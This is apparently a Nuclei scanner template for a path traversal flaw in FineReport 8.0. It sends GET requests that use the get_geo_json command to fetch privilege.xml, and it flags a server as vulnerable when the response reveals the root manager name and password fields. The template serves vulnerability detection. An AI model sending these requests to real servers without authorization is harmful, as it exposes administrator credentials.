28 lines
656 B
YAML
28 lines
656 B
YAML
id: finereport-path-traversal
|
|
|
|
info:
|
|
name: FineReport 8.0 Path Traversal
|
|
author: pikpikcu
|
|
severity: medium
|
|
reference: http://foreversong.cn/archives/1378
|
|
tags: finereport,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"
|
|
- "{{BaseURL}}/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "<rootManagerName>"
|
|
- "<rootManagerPassword>"
|
|
part: body
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|